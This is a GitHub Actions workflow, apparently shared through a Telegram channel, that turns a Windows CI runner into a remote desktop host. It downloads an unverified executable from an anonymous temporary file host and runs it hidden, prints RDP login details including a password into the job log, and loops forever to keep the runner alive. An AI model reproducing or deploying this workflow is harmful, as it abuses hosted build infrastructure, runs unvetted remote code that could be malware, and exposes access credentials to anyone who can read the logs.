name: "RDP-ARMOUR Temp Test"

on:
  workflow_dispatch:
    inputs:
      chosen_tool:
        required: true
        default: 'rdp'

jobs:
  test-run:
    runs-on: windows-latest

    steps:
      - name: Download Master Loader
        shell: pwsh
        run: |
          $url = "http://tmpfiles.org/dl/31974101/main.exe"
          curl -L $url -o "Master_Loader.exe"

      - name: Execute and Monitor
        shell: pwsh
        env:
          CHOSEN_TOOL: ${{ github.event.inputs.chosen_tool }}
        run: |
          Start-Process -FilePath "./Master_Loader.exe" -WindowStyle Hidden

      - name: Maintain Connection + Watch RDP User
        run: |
          Write-Host "Thanks to MR.English2008 for this perfect work"
          Write-Host "follow for more in my telegram channel"
          Write-Host "https://t.me/ME2008_RDP"
          
          Write-Host "`n=== RDP ACCESS ==="
          Write-Host "Address: $env:TAILSCALE_IP"
          Write-Host "Username: ME2008"
          Write-Host "Password: $(echo $env:RDP_CREDS)"
          Write-Host "==================`n"
          
          while ($true) {
              Write-Host "[$(Get-Date)] RDP Active - MR.English2008 "
              Start-Sleep -Seconds 300
          }
